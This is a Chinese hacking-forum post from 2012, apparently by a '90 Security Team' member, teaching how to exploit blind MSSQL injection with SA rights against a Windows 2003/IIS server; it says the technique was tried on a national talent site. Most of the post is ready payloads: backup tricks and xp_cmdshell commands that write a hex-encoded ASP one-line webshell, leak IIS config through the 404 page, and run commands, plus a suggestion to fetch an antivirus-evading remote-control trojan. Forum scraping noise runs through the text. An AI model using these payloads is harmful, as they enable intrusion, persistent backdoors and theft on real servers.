找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2112|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————2 h6 E$ p3 r0 O; V2 F
, Q7 c9 q3 A" D. H# X

% u! @6 Y! ~( D5 r  E9 y                                                             欢迎高手访问指导,欢迎新手朋友交流学习。/ x7 O/ ^6 c% ?
" ~- _+ V) q  t7 ^# @8 e
                                                                 % ^" ]6 q3 `, J* }2 E7 C6 O* O: U
                                                                 
  g7 w) L! [$ S                                                                  论坛: http://www.90team.net/- p! W/ E. J" `% l% \2 U
1 W; h+ w$ D7 f0 k5 X0 H$ q

& s' A4 P8 d: q# Y% `9 e8 h, t0 \% D% Z! }- p/ k# j
友情检测国家人才网3 a) ^7 T- r# g8 z# l; |

1 u- K$ J' h$ i2 w
8 [4 d1 [) u; k3 n0 i% J内容:MSSQL注入SA权限不显错模式下的入侵& F$ t. [3 @: {$ A2 {7 l* ~) `$ B
/ r! Y% d  v$ k! W; ]; G# A, e; H, a

1 s! w, [/ q8 b  Q- \1 L" C一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。5 y+ W2 f2 h1 w5 R
3 b5 Y( P# ~. F( c
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
+ f3 t8 H+ ^" _& V$ n5 P3 O- G0 P( p/ j/ d3 q; B
6 N' P7 }2 p$ @
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。# B8 r3 ~1 N0 [, A

& F, N/ P# w$ q# B0 \  @7 [思路:5 C% {. ?2 f& W) {( h6 N

* `0 J& p* W" N2 @+ z4 {首先:
" l9 ~3 [2 ^2 V- ?/ l- Y# Z% C1 n. k1 |4 J7 |# i9 |
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
8 u) ~0 T6 a: a/ M
( u2 [; b6 \& k+ R6 N; L1.日志备份获得Webshell
( ]# U* ?$ G- H# L1 C
2 F* f4 \' V! B! y% ?/ W2.数据库差异备份获得Webshell1 K3 r7 g% c( V/ a+ I" b7 k% e4 ]
: J5 d. d; q+ L
4.直接下载免杀远控木马。* }, O* J% X) i2 \

$ j& P/ R7 y5 g6 t5.直接下载LCX将服务器端口转发出来. j, z3 e# a" B7 s3 ~
& j# C$ D8 H7 @5 j* r( I/ o
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。7 u. }( X& d) D  k: \6 w0 t" n8 \! a
; D- q& n: b4 w; N2 G* n; M

1 V% Y8 F: X  D' q
/ U& S" s( I  {, Q6 Z6 {- [, d在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
. [8 l' Y, {6 H6 ^$ l3 d6 E3 t- o& i  @) p0 P9 @
我直接演示后面一个方法" A) Y7 a! P# O& h

, S# r8 k8 n% ~" f
' U7 \; n3 y: K3 E& H分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
3 \, q8 p4 L% z' G, V! p% D* ^7 ]. k4 g- W& L* n
* x5 ?' _- ?6 D. {
; e! k! ?6 q  c; z1 z( U# s

# E( W+ a. R) }; @6 t3 W1 D◆日志备份:2 S; @7 d  R* C9 E* n* O
8 b, R& {& V( X! m5 }
" e0 K6 W- R) f1 |  x7 m) n# B
1. 进行初始备份9 @. r- ~+ Y9 X
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--: u% z/ B( a- U6 i' U, G
7 k8 i5 ]% {! U9 N7 \& n* W
2. 插入数据! ]  j" x8 M; N* X9 f
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--; u' ^# t  f% |) n9 U" ^& ?
: i9 R$ c3 E" z
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>- t6 {  q$ d; z% C
  + @2 P) N' |6 a9 A  V" P
3. 备份并获得文件,删除临时表
6 F+ E; v4 h7 S( n6 K; V$ ~+ J;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
  R8 [  n1 \4 I: ?( t4 z$ B: g) o3 g( Q- Q- M# p. {" ]" @. S

7 C5 m& K1 q$ [5 K$ X
8 X1 E. k7 ]9 [◆数据库差异备份
* N# u; F! J' M6 m& t) a. U+ a- ~) H. H, Y4 ?- O+ E
(1. 进行差异备份准备工作  m9 [( R% C" x- f" x0 C$ A
) t$ g1 }$ _: D+ C- q5 Z
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
% O9 W( R* z& T+ _  Y% }) ]0 ^% z6 ]9 z+ i% [
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码4 |/ [2 h6 k& m0 G# U
$ q- ]; Q! |- f2 V1 y  @* h

( m2 k, l3 {* t* W0 s4 _) X3 A+ H(2. 将数据写入到数据库4 R5 K7 m% s' V' h: @5 e; Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
0 ?3 k9 W" S/ v5 f; R
3 _4 q/ [4 i' z3 h0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
$ V  d; J: @; |1 L2 `
9 @5 W  J5 Y3 _2 v3. 备份数据库并清理临时文件
5 o6 b* j, ]0 v, w, I6 S7 `  Y2 m8 V- a6 z7 ^- U
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
/ }4 I( @* j0 R
- [/ L3 H+ @  [8 A0 O( K/ W0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
& r+ _: Q- m* ]$ R, j! b* m2 S5 J& J" Y# S; e
, A* f' i  r/ ]* }& K3 C

$ u- p) |3 W6 ~. x  U用^转义字符来写ASP(一句话木马)文件的方法:   3 a8 T: Y: R' d& {7 S' \" A. I: _

% l5 f0 N: ]6 x1 Y* o  u) w1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
: O& x, g0 D# Z4 ~4 T5 v$ |7 w+ e( ^# L5 |
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
) q! U6 A! d4 Z3 b4 h; u+ F  H( L1 j9 c! _8 O# ~
读取IIS配置信息获取web路径3 j$ I2 F: N! x0 i0 m0 R& z

7 N5 y: E7 c5 A  V     ' r# m0 A/ P$ O4 n/ }9 p
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--; P: M! H# G4 D

3 W  P5 X6 ~: J5 y% ^* g) n! Z. n执行命令
% u9 p. \! ]# o     
, j: Q  P: ~' D+ j6 k     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--& p1 h, F! h# D$ q1 }

# Y$ k% x  j( F0 e" h* z1 X* c/ c7 }8 [
3 W5 \3 }9 a# A; f" j  j* o; t

: n# y( A4 `. I. k1 V+ Y5 o7 o8 O
+ p4 J" I6 }7 `, W2 ?% G3 L
2 ^$ T' A6 ]- |: H
# x6 f4 A- q6 {- L  ^* }/ s
! n' ]7 Y7 A  x9 X- Y0 p
1 Y8 U8 m4 }; X7 q! a, ~. U) r% X8 R! Y/ w; ]

3 v( q2 w' b& c+ |) u# t: P$ o$ j. }9 X( E, |# g

" @# H5 y2 n' @
! }) b  n1 a" X; A5 W8 G/ R7 B3 ~( b
$ [) Y4 c$ X) k+ s$ u( o
. Y3 n& C+ }# O4 q
! {4 ]- l, R/ Q' r$ e/ L
; [# a) ?  M; @! {7 ~
& k2 t6 R4 A) Q- `0 z5 H" I4 i: n
5 \+ P/ J! J* I7 w2 Q+ e) s
+ {  D4 W1 p- q

3 g, ^$ G: F: `
3 Y$ t4 C! y7 c. _% r6 k5 r$ [
6 C2 v: ]$ k! Z* g- x. k" i& g0 ]2 E$ s' o# r- G7 ~
& z  }, r" s: `

# i' m( v# z  K0 ~
/ ]  d6 u' e* j5 Z# H% r
3 ]# X4 ?- v' w9 K9 F, ?4 X3 F* z( X6 G/ P$ _0 x) j2 b
4 D0 M! `/ b1 U! G( j0 Y

# R, N0 K3 \* N; e7 p; e  z6 k( Z% C% B. _
" |+ b2 Y5 z8 g5 J" U& [" y
0 o. P) k. p* U+ U, _" R5 V
) K0 m% o8 s( L6 e' V; i

! b  d5 }9 i' q3 I# j! i" T8 r9 c; o/ i
! y5 a$ B: D7 U: j7 R1 B
1 u8 Q* F+ F3 A+ ?: V" ?
. s; y' y' t8 j& Z2 j
) |9 n+ j/ f' Y! ^- b
/ @! |* b3 a5 A( w3 r
: ~% o; x6 C1 w1 [' ^; g
6 I! o2 i, w4 D  w5 J3 p5 D1 ^* C

8 t2 J3 b0 Y: M/ I: U+ r' k+ A+ ^2 O  w5 |8 g. z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表